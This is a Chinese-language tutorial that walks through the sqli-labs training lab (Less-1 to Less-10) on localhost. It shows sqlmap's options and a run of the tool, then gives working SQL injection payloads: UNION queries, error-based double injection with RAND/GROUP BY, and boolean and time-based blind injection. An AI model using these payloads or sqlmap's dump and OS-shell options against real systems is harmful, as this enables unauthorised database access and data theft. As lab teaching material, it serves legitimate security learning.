sql注入博大精深,咱们今天来看个工具

说今天要用工具,那就推荐一个特别强的工具sqlmap

还是Less-1,前面的基础都明白的话,这里也应该会明白的

0X01 SQLMAP简介

先介绍sqlmap-----一款贼强的sql注入工具

xuan@ubuntu:~$ sqlmap -h
Usage: python sqlmap [options]

Options:
  -h, --help Show basic help message and exit
  -hh Show advanced help message and exit
  --version Show program's version number and exit
  -v VERBOSE Verbosity level: 0-6 (default 1)

  Target:
  At least one of these options has to be provided to define the
  target(s)

  -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
  -g GOOGLEDORK Process Google dork results as target URLs

  Request:
  These options can be used to specify how to connect to the target URL

  --data=DATA Data string to be sent through POST
  --cookie=COOKIE HTTP Cookie header value
  --random-agent Use randomly selected HTTP User-Agent header value
  --proxy=PROXY Use a proxy to connect to the target URL
  --tor Use Tor anonymity network
  --check-tor Check to see if Tor is used properly

  Injection:
  These options can be used to specify which parameters to test for,
  provide custom injection payloads and optional tampering scripts

  -p TESTPARAMETER Testable parameter(s)
  --dbms=DBMS Force back-end DBMS to this value

  Detection:
  These options can be used to customize the detection phase

  --level=LEVEL Level of tests to perform (1-5, default 1)
  --risk=RISK Risk of tests to perform (1-3, default 1)

  Techniques:
  These options can be used to tweak testing of specific SQL injection
  techniques

  --technique=TECH SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
  These options can be used to enumerate the back-end database
  management system information, structure and data contained in the
  tables. Moreover you can run your own SQL statements

  -a, --all Retrieve everything
  -b, --banner Retrieve DBMS banner
  --current-user Retrieve DBMS current user
  --current-db Retrieve DBMS current database
  --passwords Enumerate DBMS users password hashes
  --tables Enumerate DBMS database tables
  --columns Enumerate DBMS database table columns
  --schema Enumerate DBMS schema
  --dump Dump DBMS database table entries
  --dump-all Dump all DBMS databases tables entries
  -D DB DBMS database to enumerate
  -T TBL DBMS database table(s) to enumerate
  -C COL DBMS database table column(s) to enumerate

  Operating system access:
  These options can be used to access the back-end database management
  system underlying operating system

  --os-shell Prompt for an interactive operating system shell
  --os-pwn Prompt for an OOB shell, Meterpreter or VNC

  General:
  These options can be used to set some general working parameters

  --batch Never ask for user input, use the default behaviour
  --flush-session Flush session files for current target

  Miscellaneous:
  --sqlmap-shell Prompt for an interactive sqlmap shell
  --wizard Simple wizard interface for beginner users

以上来自sqlmap -h,不懂的查字典咯

所以来试试,在terminal输入mysql -u "http://127.0.0.1/sql/Less-1/?id=1" -p id --current-db

xuan@ubuntu:~$ sqlmap -u "http://127.0.0.1/sql/Less-1/?id=1" -p id --current-db
         _
 ___ ___| |_____ ___ ___  {1.0.4.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:11:53

[17:11:54] [INFO] resuming back-end DBMS 'mysql'
[17:11:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1' AND 7807=7807 AND 'oGvN'='oGvN

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))ZXJh) AND 'QbDh'='QbDh

  Type: UNION query
  Title: Generic UNION query (NULL) - 3 columns
  Payload: id=-7937' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x516e68626f6c6c4d665346764a57554a5853436b76454547716441456d5349624a704f744d425250,0x716b6a6a71)-- -
---
[17:11:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[17:11:54] [INFO] fetching current database
[17:11:54] [INFO] resumed: security
current database: 'security'
[17:11:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:11:54] [INFO] fetched data logged to text files under '/home/xuan/.sqlmap/output/127.0.0.1'

发现数据库就是security你们电脑好的可以来试一下-a,可以脱裤的呦2333

现在我们打开Less-1的result.txt看一下

sqlmap可以自动帮我们做测试,进行sql注入测试,另外,我们可以通过这些payload来学习攻击方法

0X02真正开始sql注入第一课————Less-1(Single quotes - String)

前一章说了,当传入id=1'时会报错,那么猜测为Select * from tables where id = '$id' 那么我们可以将后面注释,那么可以在id后接上各种奇怪的语言,首先来看一下union联合查询。

传入id=0'union select 1,2,3%23(ps:前一个必须是空集,后面的才可以返回出来),sql注入为什么会有很大的威力呢,让我们复习一些奇怪的函数以及sql数据库

第一个 concat函数和concat_ ws这个函数可以把多行链接起来尤其是concat_ws(char(58),1,2,3)char(58)是:,user(),database(),version()可以得到mysql数据库的基础

第二个是information_schema数据库表的说明:

  • SCHEMA表
  • TABLES表
  • COLUMNS表

SCHEMATA表,提供当前mysql实例中所有数据库信息,SHOW DATABASES;返回的表

TABLES表,提供关于数据库中表的信息(包括视图),详细表描述了某个表属于那个SCHEMA,表类型,表引擎,创建时间等信息其中table_name列是表名,另外必须要加上table_schema的限制条件

COLUMNS表,提供表中数据类型,详细表述了某个表的所有列以及每个列的信息

首先注数据库名,然后注表名,之后注字段,然后就找到数据了。

作为基于错误的GET数据的字符型注入,没有什么payload直接打就行

0X03less-2(GET - Error based - Intiger based)

不用闭合单引号,或者注释单引号,因为这里从结果集获得1行数据,如果获得全部数据还是要注释后面的单引号

0X04Less-3(GET - Error based - Single quotes with twist string)

基于单引号字符型数据--也是可以注释的

0X05Less-4(GET - Error based - Double Quotes - String)

双引号里面可以包含单引号,所以判断时,加入双引号进行判断,另外,还需要右括号闭合左括号

0X06Less-5(GET - Double Injection - Single Quotes - String)

双注入,双注入是一个十分严重的漏洞,让我们先来认识几个sql函数

rand(),floor(),count(),group by

这四个分别是取随机,取浮点数,聚合,分组

下面通过这道题来了解一下双注入(double injection)。先通过数据库看一些问题,select database()会返回所在的数据库,concat会聚合参数,GROUP BY 可以进行分组,当我们向Less-5提交SELECT COUNT(*),COUNT(*),CONCAT((SELECT DATABASE()),FLOOR(RAND()*2)) AS a from information_schema.tables group by a; 这样会产生一个报错Duplicate entry 'security1' for key '<group_key>'意思呢自己翻译一下咯,这样数据库名就出来咯,接下来注表名也是同样的操作

让我们来分析一下提交的sql语句CONCAT((SELECT DATABASE()),FLOOR(RAND()*2))会返回一个concat结合的字符串,分组输出,但是,如果在count函数后使用分组语句会把查询的一部分以错误的形式展示出来,所以我们的语句才会显示出数据库名,继而产生sql注入漏洞。在生产中需要注意不要把sql错误随便输出,以免产生这样的漏洞。

0X07Less-6(GET - Double Injection - Double Quotes - String)

Less-5单引号改为双引号了

0X08Less-7(GET - Dump into outfile - String)

这是文件get字符型注入,过几天再说吧

0X08-0X10盲注

基本上呢就是根据ascii,substr来一位一位跑sql中的数据,基于时间的盲注呢就是如果成功sleep一下,通过if语句来实现,脚本自己写吧,自己动手丰衣足食